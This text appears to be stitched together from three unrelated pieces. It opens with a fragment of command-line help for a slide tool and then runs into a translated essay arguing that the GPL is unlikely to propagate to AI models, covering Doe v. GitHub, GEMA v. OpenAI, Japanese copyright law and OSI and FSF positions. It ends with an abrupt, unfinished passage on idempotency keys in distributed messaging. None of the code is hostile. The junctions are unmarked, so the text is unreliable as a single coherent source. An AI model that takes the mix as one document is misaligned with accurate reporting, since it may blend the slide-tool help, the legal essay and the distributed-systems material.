-a, --dev-addr <IP:PORT> IP address and port to serve slides locally.
-o, --open Open the website in a Web browser after the
initial build finishes.
-h, --help Show this message and exit.
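For example, to preview the slides locally while editing and open them in a browser once the initial build finishes (using the serve options above):

mkslides serve -o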
When GitHub Copilot was launched in 2021, the fact that its training data included a vast amount of Open Source code publicly available on GitHub attracted significant attention, sparking lively debates regarding licensing. While there were issues concerning conditions such as attribution required by most licenses, there was a particularly high volume of discourse suggesting that the conditions of copyleft licenses, such as the GNU General Public License (GNU GPL), would propagate to the model itself, necessitating that the entire model be released under the same license. The propagation of the GPL is a concept that many modern software engineers have naturally accepted; thus, for an engineer with a straightforward sensibility, it is a perfectly natural progression to think that if GPL code is included in some form, copyleft applies and the license propagates.
However, as of 2025, the theory that the license of the source code propagates to AI models trained on Open Source code is not heard as often as it was back then. Although some ardent believers in software freedom still advocate it, they appear to be drowned out by the benefits of AI coding, which has thoroughly permeated the programming field. Amidst this trend, even I sometimes succumb to the illusion that such a theory never existed in the first place.
Has the theory that the license of training code propagates to such AI models been completely refuted?
Actually, it has not. The issue remains unsettled: lawsuits are still ongoing, and the positions of major national governments have not been made clear. In this article, I will explain the current state of this license propagation theory, namely “GPL propagates to AI models trained on GPL code,” and connect it to broader questions such as the legal positioning of models and the nature of the freedom we pursue in the AI domain.
Note: This article is an English translation of a post originally written in Japanese. While it assumes a Japanese reader, I believe it may also be useful for an English-speaking audience.
The Current Standing in Two Lawsuits
First, let us organize what the “GPL propagation theory for AI models” entails. This is the idea that when an AI model ingests GPL code as training data, the model itself constitutes a derivative work of the GPL code; therefore, when distributing the model, the copyleft conditions of the GPL, such as the obligation to disclose source code, apply. In other words, it is not a question of whether the output of the model is similar to the GPL code, but a claim that “since the model itself is a derivative containing GPL code, the GPL extends to the model.” While there were many voices supporting this theory around 2021, as mentioned earlier, it is no longer the mainstream of the discussion today. However, two major ongoing lawsuits can be cited as grounds that this theory has not been completely rejected: Doe v. GitHub (the Copilot class action) filed in the United States, and GEMA v. OpenAI filed in Germany. I will explain the history and current status of each lawsuit below.
Doe v. GitHub (Copilot Class Action): The Persisting Claim of Open Source License Violation
In the Copilot class action filed at the end of 2022 in relation to GitHub Copilot, anonymous developers became plaintiffs and argued that GitHub, Microsoft, and OpenAI trained their models on source code from public repositories without permission, inviting massive license violations through Copilot. Specifically, they viewed it as problematic that when Copilot reproduces part of the code that served as the training source in its output, it does not perform the author attribution or copyright notice required by licenses such as MIT or Apache-2.0 at all, and furthermore, it indiscriminately trains on and outputs code under licenses that impose copyleft conditions like the GPL, thereby trampling on license clauses. The plaintiffs claimed this was a contractual violation of open source licenses and also sought damages and injunctions, asserting that it constituted a violation of the Digital Millennium Copyright Act (DMCA) under copyright law.
In this case, several decisions have already been handed down by the United States District Court for the Northern District of California, and many of the plaintiffs’ claims have been dismissed. What were dismissed were mainly peripheral claims such as DMCA clause violations, privacy policy violations, unjust enrichment, and torts, but some DMCA violations and the claim of “violation of open source licenses” (breach of contract) are still alive. Regarding the latter specifically, the argument is that despite the plaintiffs’ code being published under licenses like GPL or MIT, the defendants failed to comply with the author attribution or the obligation to publish derivatives under the same license, which constitutes a contractual violation. Although the court did not recognize claims for monetary damages because the plaintiffs could not demonstrate a specific amount of damage, it determined that there were sufficient grounds for the claim for injunctive relief against the license violation itself. As a result, the plaintiffs are permitted to continue the lawsuit seeking an order prohibiting the act of Copilot reproducing others’ code without appropriate license indications.
As is clear from the above history, “violation of open source licenses in training data” is still being contested in court in the Copilot litigation, and this is one of the reasons why the theory of license propagation to models has not been completely denied. The plaintiffs’ claim in this lawsuit does not directly demand the release of the model itself under the GPL, but it legally pursues the point that license conditions were ignored in the process of training and output; consequently, it suggests that “if the handling does not follow the license of the training data, the act of providing the model could be illegal.” Furthermore, the court has not clearly rejected this logic at this stage and has indicated a judgment that the use of open source code is accompanied by license obligations, and providing tools that ignore this could constitute a tort subject to injunction.
However, it is necessary to note that the claims in the Copilot litigation are legally framed as breach of contract (license) or DMCA violation, and are not a direct copyright argument that “the model is a derivative work of GPL code.” No judgment has been shown stepping so far as to mandate the disclosure of the entire model under the GPL license. The actual judgment is conservative, stating “monetary damages have not been shown, but there is room for future injunctive relief,” and does not mention the obligation to disclose the model itself. In other words, at present, there is no judicial precedent directly addressing the “GPL propagation theory to models,” and the situation is one where the issue raised regarding license violation of the source code remains alive in the judicial arena.
GEMA v. OpenAI: The Theory Treating “Memory” in Models as Legal Reproduction
Another important lawsuit is the case where the German music copyright collective GEMA sued OpenAI. This is a copyright lawsuit concerning the unauthorized training and output of lyrics by an AI model, not AI code generation, but it carries significant theoretical implications related to “license propagation to models” even if not directly related to GPL.
In November 2025, the Munich I Regional Court handed down its judgment in this lawsuit. Addressing the fact that ChatGPT’s models had memorized and reproduced the lyrics of nine famous German songs, the court held that this “memorization” inside the model itself constitutes an act of reproduction under copyright law. According to the judgment, the lyrics managed by the plaintiff were “fixed” in the GPT-4 and GPT-4o models, such that they were output almost verbatim when the user gave a simple prompt. On this basis, the court determined that the model internally contains “parameters that memorized the work,” and that if an appropriate prompt allows a human to obtain an expression substantially identical to the original work, that memorization itself falls under “reproduction” in Article 16 of the German Copyright Act. Furthermore, it determined that actually outputting lyrics in response to a prompt is a separate act of reproduction, and that providing the lyrics to the user constitutes making the work available to the public (public transmission). It also ruled that since all of this was done without the permission of the rights holder, it falls outside the scope justified by the TDM (text and data mining) exception in the EU DSM Copyright Directive.
The important point of this judgment is that it clearly acknowledged that “if a work is recorded inside the model in a reproducible form, that state itself can constitute copyright infringement.” The court cited the text of the EU InfoSoc Directive that “reproduction includes copies in any form or manner, and does not need to be directly perceptible to humans,” and stated that in the spirit of this, even if the lyrics are encoded within the model’s parameters, it amounts to the creation of a reproduction. It went as far as to mention that “encoding in the form of probabilistic weights does not prevent it from being considered a copy,” showing a strong recognition that differences in technical formats cannot avoid the nature of reproduction under copyright law. Also, since the fact that the model could output the lyrics was not coincidental but highly consistent, it was factually found that “the direct incorporation of the essential part of the training data” occurred rather than the result of statistical learning. As a result, the Munich District Court recognized OpenAI’s liability for injunction and damages regarding the output act of the lyrics in question, and further ordered the provision of information regarding training data and output content for the future. However, this judgment is the first instance, and since OpenAI has indicated an intention to appeal, it is expected to be a continuing dispute.
The noteworthy theory shown by this GEMA judgment is the extension of the concept of reproduction under copyright law to the interior of the model. That is, if the work used as training data remains within the model and can be reproduced with a simple operation, it means the model already contains a reproduction of that work. This theory is groundbreaking in that it deems “the model contains the source work,” and indeed, in a commentary by Osborne Clarke, it is evaluated that “in contrast to the judgment of the English High Court in the Getty v. Stability AI case, the Munich District Court explicitly recognized the possibility that the AI model contains copies of the training material.” Standing on this view, the model is not merely a result of analysis, but depending on the case, can be evaluated as an aggregate of the training data itself.
However, it is necessary to keep in mind that this judgment is based on an extreme case where a complete match output was obtained with short text such as lyrics. The court itself stated, “Normally, temporary reproduction for learning remains within the purpose of analysis and does not infringe on the rights holder’s market, but in this case, the model holds the work in a restorable form and exceeds the scope of analysis,” emphasizing that the judgment is limited to “cases where the model performs complete reproduction.” Also, as the UK case shows, judicial decisions vary by country, and a legal consensus on this issue has not yet been formed.
Nevertheless, the judgment this time, which declared that the recording of a work inside a model is a reproduction, can become a major basis supporting the license propagation theory. This is because, while the premise for discussing GPL propagation is “whether the model can be said to be a reproduction or derivative work of the GPL code,” the logic of the Munich District Court legally certified exactly that “a model can be a reproduction of training data”.
Possibilities Derived from the Current Status of the Two Lawsuits
From the two lawsuits above, we can consider the path through which the theory of license propagation to AI models might be recognized in the future.
Let us assume the worst-case scenario from the perspective of AI operators, where these lawsuits are finalized with the plaintiffs winning. In the Copilot litigation, the judgment that “model providers must comply with the license conditions of the training source code” would be established, and in the GEMA litigation, the legal principle that “the model encompasses reproductions of the work” would be established. When these two intersect, the conclusion that “since an AI model containing GPL code is a reproduction or derivative work of the GPL code, the conditions of the GPL directly apply to its provision” is theoretically derived. That is, the possibility emerges that the theory of GPL propagation to models is effectively ratified by the judiciary.
Specifically, if the model memorizes and contains GPL code fragments internally, the act of distributing or providing that model to a third party may be regarded as the distribution of a reproduction of GPL code; in that case, the act of distribution under conditions other than GPL would be evaluated as a GPL license violation. If a GPL violation is established, there would be room to argue for remedies such as injunctions and claims for damages, as well as forced GPL compliance demanding the disclosure of the entire model under the same license, just as in the case of ordinary software. In fact, the remedies GEMA sought from OpenAI included disclosure regarding training data and output content, and although this is in the context of musical works, this can be said to be a type of disclosure request to make transparent “what the model learned and contains.” In the case of a GPL violation as well, the possibility cannot be denied that demands such as “disclosure of the GPL code parts contained inside the model” or “source disclosure in a form that allows reconstruction of the model” would emerge in seeking license compliance.
Even if not reaching such an extreme conclusion, an intermediate scenario could involve imposing certain restrictions on model providers. For example, the Copilot litigation might be settled or judged by taking measures such as “attaching a license and author attribution at the time of output if existing code of a certain length or more is included in the generated code,” or technically mandating the implementation of filters so that GPL code fragments are not extracted or reproduced from the model. In fact, GitHub, the developer of Copilot, has already introduced an optional feature that “excludes from suggestions if the candidate code matches existing code on large-scale repositories,” attempting to reduce litigation risk. Also regarding OpenAI, there are reports that it strengthened filters so that ChatGPT does not output copyrighted lyrics as they are, in response to the GEMA judgment.
While these are not license propagation itself legally, in practice, they indicate that the industry is steering in the direction of “ensuring the model does not potentially infringe license conditions.” In the future, there is a possibility that guidelines for excluding data with specific license terms like GPL at the model training stage, or mechanisms and systems to guarantee that there is no license-infringing output by conducting output inspections after training, will be established.
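To make the idea of such an output inspection concrete, here is a minimal sketch of a verbatim-overlap check in Python. It is only an illustration of the general technique, not how GitHub's or OpenAI's filters actually work; the gpl_corpus directory, the *.c file glob, and the 25-token window are hypothetical choices.

```python
# Minimal sketch of a post-generation "output inspection": flag a generated
# snippet if it shares a long verbatim token run with any reference file.
# The corpus path and the 25-token threshold are illustrative assumptions,
# not values used by any real product.
from pathlib import Path
import re

WINDOW = 25  # number of consecutive tokens treated as "verbatim reuse"

def tokenize(text: str) -> list[str]:
    # Split into rough code tokens: identifiers or single non-space characters.
    return re.findall(r"[A-Za-z_][A-Za-z_0-9]*|\S", text)

def ngrams(tokens: list[str], n: int) -> set[tuple[str, ...]]:
    # All contiguous runs of n tokens (empty when the input is shorter than n).
    return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}

def build_reference_index(corpus_dir: str, n: int = WINDOW) -> set[tuple[str, ...]]:
    # Index every n-token run found in the reference corpus.
    index: set[tuple[str, ...]] = set()
    for path in Path(corpus_dir).rglob("*.c"):
        index |= ngrams(tokenize(path.read_text(errors="ignore")), n)
    return index

def flags_verbatim_reuse(generated: str, index: set[tuple[str, ...]], n: int = WINDOW) -> bool:
    # True if any n-token run of the generated text also occurs in the corpus.
    return any(gram in index for gram in ngrams(tokenize(generated), n))

if __name__ == "__main__":
    # "gpl_corpus/" is a hypothetical local mirror of GPL-licensed sources.
    index = build_reference_index("gpl_corpus")
    snippet = "int main(void) { return 0; }"
    if flags_verbatim_reuse(snippet, index):
        print("Suppress the suggestion or attach license and attribution first.")
    else:
        print("No long verbatim overlap with the reference corpus detected.")
```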
In any case, until these two lawsuits are finally settled and any subsequent legislative response is determined, the “theory of GPL propagation to models” has not completely disappeared. It is a scenario that could suddenly become realistic depending on future judgments, and even if the plaintiffs lose, support for this theory may reignite within the open source community. It should be noted that while it is currently an undetermined theory that is no longer shouted as loudly as before, that does not mean it has been legally denied and resolved. As a community, we need to carefully consider countermeasures while observing these trends and taking into account the legal systems of each country and the opposing arguments described in the latter half of this article.
Treatment under Japanese Law
Based on the trends of the overseas lawsuits mentioned above, I will also organize the relationship between AI models, copyrighted works, and licenses under Japanese law. In Japan, Article 30-4 of the Copyright Act, introduced by the 2018 amendment, exists as a provision that comprehensively legalizes reproduction acts associated with machine learning. Furthermore, in March 2024, the Copyright Division of the Council for Cultural Affairs of the Agency for Cultural Affairs published a guideline-like document titled “Thought on AI and Copyright” (hereinafter “the Thought”), presenting a legal organization divided into the development/training stage and the generation/utilization stage of generative AI.
According to “the Thought,” reproduction performed for the purpose of AI training is in principle legal as long as it satisfies “information analysis not for the purpose of enjoying the thoughts or sentiments expressed in the work” as defined in Article 30-4. Therefore, acts of collecting and reproducing a wide range of data from the internet to create a training dataset for research and development purposes can in principle be done without the permission of the rights holders. However, what is important is whether a “purpose of enjoyment” is mixed into that training act. “The Thought” states that if training is conducted with the purpose of “intentionally reproducing all or part of the creative expression of a specific work in the training data as the output of generative AI,” it is evaluated as having a concurrent purpose of enjoying the work rather than mere information analysis, and thus falls outside the application of Article 30-4. As a typical example, “overfitting” is cited: acts such as making a model memorize specific groups of works through additional training so that it outputs something similar to those works are judged to have a purpose of enjoyment.
Furthermore, “the Thought” also mentions the legal treatment of trained models, stating first that “trained models created by AI training cannot be said to be reproductions of the works used for training in many cases.” This is the view that since the model can generate outputs unrelated to the original in response to various inputs in a general-purpose manner, the model itself is not a copy of any specific work.
However, “the Thought” simultaneously acknowledges the possibility that, exceptionally, in cases where “the trained model is in a state of generating products with similarity to the work that was training data with high frequency,” the creative expression of the original work remains in the model, and it may be evaluated as a reproduction. It also points out that in such cases, the model is positioned as a machine for copyright infringement, and a claim for injunction may be recognized. In short, usually the model is merely statistical data and not the work itself, but if it has turned into a device for spewing out specific works almost as they are, it can be treated as an infringing item; this thinking shares parts with the content of the GEMA judgment.
It is necessary to note that the above organization is strictly a discussion of the scope of application of rights limitation provisions (exception provisions) under the Copyright Act, and does not touch upon the validity of contracts or license clauses. The Agency for Cultural Affairs document discusses from the perspective of “whether it is copyright infringement or not,” and does not deny that even if the training act is legal, contractual liability may arise if it violates terms of service or open source licenses separately. Also, no in-depth view has been shown regarding the propagation of copyleft clauses like the GPL. In Japan’s Copyright Act, there is no override provision where rights limitation provisions like Article 30-4 take precedence over contract conditions, and the “Contract Guidelines on Utilization of AI and Data” by the Ministry of Economy, Trade and Industry suggests the possibility that if there is a contract prohibiting data use between parties, that contract takes precedence.
Therefore, if the license is regarded as a valid contract, even if “training is legal” under Article 30-4 of the Copyright Act, the risk remains that it becomes a “violation of license conditions” under contract law, and it can be said that at least there is no official view organizing the theory of GPL propagation to models. In other words, currently, while the legality of model training acts is recognized quite broadly under the Copyright Act, license violation is left to general civil theory, and there is no clear guideline on, for example, “whether the act of publicly distributing a model trained on GPL code constitutes a GPL license violation.” Overall, the legal organization in Japan is in a situation of “safe in principle at the copyright layer, but blank at the contract layer.” Hence, the discussion in Japan regarding the theory of GPL propagation to models relies on future judicial judgments and legislative trends, and at present, there is no choice but to consider operational guidelines carefully following the organization by the Agency for Cultural Affairs.
Arguments Negating the Theory of License Propagation to Models
As seen in the previous sections, the theory of GPL propagation to models is not legally zero. However, many legal experts and engineers point out that this theory has serious detrimental effects. Here, I present representative arguments negating the theory of license propagation to models from the layers of copyright law, GPL text, technology, and practical policy.
Arguments for Negation at the Copyright Law Layer
First, under copyright law, it is unreasonable to regard an AI model as a “derivative work” or “reproduction” of the works it was trained on. In many cases, the expressions of specific works are not stored inside the model in a form recognizable to humans. The model merely holds statistical abstractions in which text and code have been converted into weight parameters, and that is not, in itself, a creative expression to humans at all. A “derivative work” under copyright law refers to a creation that incorporates the essential features of the expression of the original work in a directly perceptible form, but one cannot directly perceive the creativity of the original code from the model’s weights. In other words, the model does not exhibit the character of a work directly enough to be evaluated as encompassing the original code. For example, the High Court of Justice in the UK stated in its judgment in the Getty v. Stability AI case that “the Stable Diffusion model itself is not an infringing copy of the training images,” showing a negative view on treating the model itself as a reproduction of works. Thus, there are many cautious positions internationally on treating the model itself as an accumulation of works or a compilation work.
Also, the output generated by the model involves probabilistic and statistical transformations, and in many cases, things that do not resemble the training source at all are output. Even if a match or similarity occurs by chance, it is difficult to prove whether it is a reproduction relying on the original or an accidental similarity. It is not realistic to conduct the certification of reliance and similarity required to discuss copyright infringement for the entire model. Ultimately, in the framework of copyright law, there is no choice but to judge “whether the model relies on a specific work” on a work-by-work basis, and recognizing uniform copyrightability or infringing nature for the model itself is a large leap. As organized in Japanese law where the model is not considered a reproduction in most cases, the schematic of model equals work is considered unreasonable under copyright law.
Arguments for Negation at the GPL Text Layer
Next, looking at the license text and intent of the GPL itself, doubts are cast on the interpretation that GPL propagates to AI models. For example, in the text of GPLv2, the target of copyleft is limited to “derivative works” of the original code provided under GPL and “works that contain the Program.” Typically, this has been interpreted as software created by modifying or incorporating GPL code, or software combined (linked) with GPL code. In the case of an AI model, it is extremely unclear which part of the original GPL code the model “contains.” Even if the model could memorize fragments of the GPL code used for training, it is a tiny fraction when viewed from the entire model, and most parts are occupied by parameters unrelated to the GPL code. There is no clear assumption shown by the GPL drafters as to whether a statistical model that may partially encapsulate information derived from GPL code can be said to be “a work containing the Program”.
Furthermore, GPLv3 requires the provision of software source code in a “preferred form for modification.” If an AI model is a GPL derivative, the problem arises as to what that preferred form for modification would be. The model weights themselves have low readability and editability for humans, and are hard to call a “preferred form for modification.” If we ask whether the training data is the source code, the original trained GPL code itself cannot be said to be the source of the model, nor is it clear if it refers to the entire vast and heterogeneous training dataset. It is difficult to define what should be disclosed to redistribute the model under GPL compliance, and it could lead to an extreme conclusion that all code and data used for model training must be disclosed. While this is what some freedom believers aim for, it can only be said to be unrealistic in reality, and it deviates from the point of the GPL’s intent to enable users to modify and build from source. Thus, existing GPL provisions are not designed to directly cover products like AI models, and forcing their application causes discrepancies in both text and operation.
In fact, the “Open Source AI Definition” compiled by the OSI (Open Source Initiative) in 2024 stops, with regard to the “information necessary for modification” of a model, at stating that sufficiently detailed information about the training data should be disclosed, and does not require the provision of the training data itself in its entirety. It also states that model weights and training code should be published under OSI-approved licenses.
In addition, the FSF (Free Software Foundation) itself does not believe that current GPL interpretation alone can guarantee freedom in the AI domain, and announced in 2024 that it has started formulating “conditions for machine learning applications to be free.” The direction indicated there is that “the four freedoms should be guaranteed to users including not only software but also raw training data and model parameters,” which conversely is an acknowledgment that this is not guaranteed under current licenses. The FSF also points out that “since model parameters cannot be said to be source comprehensible to humans, modification through retraining is more realistic than direct editing,” and can be said to be cautious about treating models as an extension of the existing GPL. Overall, claiming GPL propagation across the board to AI models, which fall outside the wording and assumptions of the GPL’s provisions, is unreasonable as a matter of interpretation.
Arguments for Negation at the Technical Layer
There are also strong counterarguments from a technical perspective against the theory of GPL propagation to models. AI models, particularly those called large language models, fundamentally hold huge statistical tendencies internally and do not store the original code or text verbatim the way a database would. Returning a specific output for a specific input is merely generation according to a probability distribution, and it is not guaranteed that the same output as the training data will always be obtained. If the model does not reproduce training data verbatim except in a very small number of exceptional cases, evaluating the model as “containing GPL code” does not fit the technical reality. In fact, OpenAI argued in the GEMA lawsuit that “the model does not memorize individual training data, but merely reflects knowledge learned from the entire dataset in parameters.” This argument was not accepted by the Munich District Court, but that was because there was a clear example of lyrics being reproduced; conversely, absent a clear example of reproduction, the view would be that the model is a lump of statistical knowledge.
Furthermore, although it has been confirmed that models can output fragments of training data, that proportion is considered extremely limited when viewed against the whole. Treating the whole as a reproduction on the basis of partial memorization is like claiming an entire image is a reproduction of a photograph just because it contains a tiny, mosaic-like fragment of it, which is an excessive generalization. Technically, it is difficult to quantitatively measure how far specific parameters of the model retain the influence of the original data, and the correspondence between the model and the training data remains statistical and hard to delineate. Therefore, criteria such as “how similar must it be for GPL to propagate?” cannot be established in the first place. The judgment of infringement has to be made on a per-output basis, and this is not consistent with the idea of applying a single license to the entire model. From the technical side, since the model is basically a statistical transformation and the majority of it is unrelated to GPL code, applying the GPL wholesale can be said to be irrational.
Practical and Policy Arguments for Negation
Finally, major drawbacks of the theory of license propagation to models can be pointed out from practical and policy perspectives. What would happen if this GPL propagation theory were legally recognized? As an extreme example, if 1 million code repositories were used to train a certain large-scale model, all the various licenses contained in them (GPL, MIT, Apache, proprietary, etc.) would “propagate” to the model, and the model provider would have to distribute the model in a form that complies with all 1 million license texts. As a practical matter, there would be combinations with contradictory conditions, such as GPLv2 and Apache-2.0, and attaching and managing a huge collection of copyright notices for a single model is nothing if not unrealistic. Applying every license to an AI model created from training data with mixed licenses is practically untenable, and in the end the only way to avoid it would be to exclude code under copyleft licenses like the GPL from the training data from the start.
Is such a situation really desirable for our community? The spirit of the GPL is to promote the free sharing and development of software. However, if asserting excessive propagation to AI models causes companies to avoid using GPL code, and as a result the value held by GPL software goes unused in the AI era, that would be putting the cart before the horse. In software development, many companies already have policies against mixing GPL code into their own products; if this likewise becomes “do not include GPL code in our AI training data,” GPL projects could lose value as data sources. Furthermore, the current legal battles surrounding AI are leaning more toward monetary compensation and regulatory rule-making, and in reality they are proceeding along a different vector from the code-sharing direction the GPL idealizes. If the theory of GPL propagation to models takes on a life of its own, in practice only data exclusion and closing-off to avoid litigation risk will progress, and there is a fear that it will not lead to the expansion of free software culture.
Policy-wise as well, governments of each country are carefully considering the use of copyrighted works in AI, but at present, there is no example establishing an explicit rule that “license violation of training data generates legal liability for the model.” Even in the EU AI Act, while there are provisions regarding the quality and transparency of training data, it does not demand compliance with open source licenses. Rather, from the perspective of promoting open science and innovation, the movement to allow text and data mining under rights limitations is strong. In Japan as well, as mentioned earlier, the direction is to broadly recognize information analysis use under Article 30-4, and the policy of forcibly applying licenses to AI models is not mainstream in current international discussions.
Based on the above, the theory of license propagation to models is highly likely to disadvantage open source on both practical and policy fronts, and cannot be called a realistic solution. What matters is how to realize the “freedom of software,” the philosophy of open source, in the AI era; the view that this should be attempted through realistic means such as ensuring transparency and promoting open model development, rather than through extreme legal interpretations, carries considerable weight, and it is something I have consistently argued as well.
The Stance of OSI and FSF
I will also organize what stance major organizations in the open source (and free software) community are currently taking in relation to the theory of GPL propagation to AI models. Representative organizations are the Open Source Initiative (OSI) and the Free Software Foundation (FSF); while they share the goal of software freedom, they do not necessarily take the same approach regarding AI models and training data.
First, the OSI formulated the “Open Source AI Definition” (OSAID) in 2024, defining the requirements for an AI system to be called open source. This definition states that the four freedoms (use, study, modify, redistribute) similar to software should be guaranteed for AI systems as well, and defines requirements regarding “forms necessary for modification” to realize that, requiring the disclosure of the following three elements.
Data Information: Provide sufficiently detailed information about the data used for training so that a skilled person can reconstruct an equivalent model.
This does not make publishing the training data itself in its entirety mandatory, but requires disclosing the origin, scope, nature, and acquisition method if there is data that cannot be published, listing data that can be published, and providing information on data available from third parties.
Code: Publish the complete set of source code for training and running the model under an OSI-approved license.
Parameters: Publish the model weights (parameters) under OSI-approved conditions.
It should be noted that while OSI states that information regarding the code used for training and training data is indispensable in addition to model weights to realize “Open Source AI,” it does not require the complete disclosure of the training data itself. This is a flexible stance that, for example, if raw data cannot be published due to privacy or confidentiality, explaining the nature of the data by clarifying that fact can substitute. Also, the legal mechanism to ensure free use of model parameters is an issue to be clarified in the future, and at present, no conclusion has been reached on legal rights control (e.g., presence or absence of copyrightability) over parameters either.
As can be read from these, the OSI promotes opening up AI models at the level of the open source definition in principle, but keeps the handling of training data at the level of information-disclosure requirements. In doing so, the OSI avoids relying on the theory of license propagation to models to demand training data disclosure, and is exploring a realistic solution that first guarantees transparency and reproducibility. In effect, the OSI rejected the GPL propagation theory at the point it published the OSAID. For what it is worth, I was probably the one who blocked the push to make training data disclosure mandatory in the final stage of the definition’s drafting process, and I believe this was the correct judgment.
On the other hand, the FSF and FSF Europe (FSFE) take a stance more faithful to fundamental principles. FSFE declared as of 2021 that “for an AI application to be free, both its training code and training data must be published under a free software license.” That is, to modify or verify the model, one must be able to obtain it including the training data, and therefore both must be free. Also, the FSF itself stated in a 2024 statement, “Under current understanding, for an ML application to be called free, all training data and the scripts processing it must satisfy the four freedoms,” trying to extend the requirements of freedom to data. Thus, FSF/FSFE stands on the position that a model with undisclosed training data is unfree as a whole even if the software part is free.
However, the FSF simultaneously states to the effect that “whether a non-free machine learning application is ethically unjust depends on the case,” mentioning that there can be “legitimate moral reasons” for not being able to publish training data (personal information) of a medical diagnosis AI, for example. In that case, it implies that although that AI is non-free, its use might be ethically permitted due to social utility. One can see an attitude of seeking a compromise between the FSF’s ideal and reality here, but in any case, there is no mistake that the FSF ultimately aims for freedom including training data.
So, does the FSF support the theory of GPL propagation to AI models? Not necessarily. Their claim is closer to an ethical standard or an ideal than to a legally enforceable rule, and they are not arguing that the current GPL license, as written, applies to models. Rather, as mentioned before, they are at the stage of trying to create new criteria and agreements. Even the FSF-funded white paper on the Copilot issue, while discussing legal points such as copyright and license violation, in substance reads largely as a GPL compliance problem for users (downstream developers), who worry that they bear the risk of GPL violation if Copilot’s output contains GPL code fragments. This is a caution to developers using AI coding tools rather than an application of the GPL to the model itself, and it is different from an approach that forces GPL compliance directly on model providers.
The Software Freedom Conservancy (SFC) naturally has a strong interest in this issue but is also cautious in some respects. The SFC started the protest campaign “Give Up GitHub” against GitHub in 2022, condemning Copilot’s methods as contrary to the philosophy of open source, and is also involved in the Copilot class action. However, in an SFC blog post, regarding this lawsuit, it showed concern about “the risk of interpretations deviating from the principles of the open source community being brought in,” and called on the plaintiffs’ side to comply with community-led GPL enforcement principles as well. The SFC also states that Copilot’s act is an “unprecedented license violation,” and while not fully denying the GPL propagation theory, it can be interpreted as fearing that a judicial precedent undesirable for the community might be created depending on the result of the legal battle. The SFC might be said to be carefully balancing between the aspect of pursuing GPL propagation and the risk of entrusting it to the judiciary.
Finally, what concerns the free software camp is that excessive propagation of licenses might, conversely, produce results that impair freedom. Both the OSI and the FSF ultimately want AI to be something open that anyone can use, but they are carefully assessing whether raising the purity of the legal theory behind demands for full data disclosure really serves that objective. Considering drawbacks such as the avoidance of open data prompted by expansive propagation interpretations, or the chilling effect of a flurry of lawsuits, the major organizations seem to share the view that it is essential not to lose sight of the larger goal of spreading freedom. Rather than agitating for GPL application to models, the pursuit of realistic solutions, such as how to make models and data open and which requirements should be relaxed in line with reality, will likely continue.
Summary
I have looked at the current state of the theory of GPL propagation to AI models above, and as a conclusion, this theory is in a halfway position where “it is not touted as loudly as before, but it has not completely disappeared.” As a result of points such as license violation of training data and reproduction within the model beginning to be scrutinized in lawsuits like the Copilot class action and
GEMA v. OpenAI
, it even appears that the hurdle for a finding of infringement is getting lower. In fact, the Munich District Court’s judgment deemed the model’s memorization to be reproduction, and the claim of open source license violation survives in the Copilot litigation.
However, on the other hand, the hurdle for the propagation of licenses like the GPL remains high. There is a large gap between a finding of infringement and the conclusion that the entire model must immediately be disclosed under the GPL or similar terms. What the current lawsuits seek is injunctions and damages, not the forced GPL-ization of the model. There is not a single example of a court endorsing the theory of GPL propagation to models itself; it remains legally uncharted territory. Even if that claim were attempted somewhere in the future, it would face the legal, technical, and practical counterarguments discussed above.
However, the situation has fluid parts, and there is a possibility that the line will shift depending on the policies of each country and the trends of the community. For example, if pressure from rights holder groups strengthens in Europe, there is a possibility that guidelines including license compliance will be formulated. Also, if a consensus is formed within the community regarding the state of copyleft in the AI era, a new license might appear. If such changes occur, a phase where the theory of propagation to models is re-evaluated will also arrive.
To offer my personal opinion, what is important at this moment is the perspective of how to balance software freedom and freedom in the AI domain. Instead of blindly trying to apply the philosophy of copyleft to AI, it is necessary to think about what is best to maximize freedom while considering the technical nature and industrial structure peculiar to AI. Fortunately, solutions to practical problems such as the open publication of large-scale AI models, dataset cleaning methods, and automated attachment of license notices are already being explored by the open source community. Promoting such voluntary efforts and supporting them with legal frameworks as necessary will likely be the key to balancing freedom and development.
The theory of GPL propagation to models is a point on which judgment is divided: an ideal to be pursued, or a nightmare to be avoided. However, as stated in this article, looking at the situation as of 2025, it is not about to become reality any time soon, and the majority of the community appears to be maintaining a cautious stance. Trial and error will likely continue on the judicial, legislative, and technical fronts, but as a community we need to keep exploring the point of compatibility between technological innovation and software freedom without jumping to hasty conclusions. That process itself can be said to be a new challenge of the AI era, on the extension of the free software spirit.
In distributed systems, there’s a common understanding that it is not possible to guarantee exactly-once delivery of messages.
What is possible
though is
exactly-once processing
. By adding a unique idempotency key to each message, you can enable consumers to recognize and ignore duplicate messages, i.e. messages which they have received and successfully processed before.
Now, how does this work exactly? When receiving a message, a consumer takes the message’s idempotency key and compares it to the keys of the messages which it already has processed. If it has seen the key before, the incoming message is a duplicate and can be ignored. Otherwise, the consumer goes on to process the message, for instance by storing the message itself, or a view derived from it, in some kind of database.
In addition, it stores the idempotency key of the message. Critically, these two things must happen atomically, typically by wrapping them in a database transaction. Either the message gets processed
and
its idempotency key gets persisted. Or, the transaction gets rolled back and no changes are applied at all. That way, it is ensured that the consumer will process a message again upon redelivery, if it failed to do so before. It also is ensured that duplicates received after successfully processing the message are skipped over.
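To make this concrete, here is a minimal sketch in Python using SQLite; the table names and message shape are hypothetical, and a real consumer would use whatever database already holds its state:

    import sqlite3

    # Minimal sketch of exactly-once processing (hypothetical schema).
    # The duplicate check, the business write, and the key insert all
    # happen inside one transaction.
    conn = sqlite3.connect("consumer.db")
    conn.execute("CREATE TABLE IF NOT EXISTS processed_keys (key TEXT PRIMARY KEY)")
    conn.execute("CREATE TABLE IF NOT EXISTS payments (id INTEGER PRIMARY KEY, payload TEXT)")

    def handle(message: dict) -> None:
        with conn:  # commits on success, rolls back on any exception
            if conn.execute("SELECT 1 FROM processed_keys WHERE key = ?",
                            (message["key"],)).fetchone():
                return  # duplicate: already processed before, skip it
            conn.execute("INSERT INTO payments (payload) VALUES (?)",
                         (message["payload"],))
            conn.execute("INSERT INTO processed_keys (key) VALUES (?)",
                         (message["key"],))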
UUIDs
So let’s discuss what makes for a good idempotency key then. One possible option would be to use a UUIDv4. These random identifiers solve the requirement of uniquely identifying each message. However, they require the consumer to store the UUIDs of all the previous messages it ever has received in order to reliably identify a duplicate. Depending on the message volume, this may not be practical. Pragmatically, you might get away with discarding received UUIDs after some time period, if it is acceptable to occasionally receive and process a duplicate after that period. Unfortunately, neither the producer of the message nor the consumer will have any indication of the duplicated processing in that case.
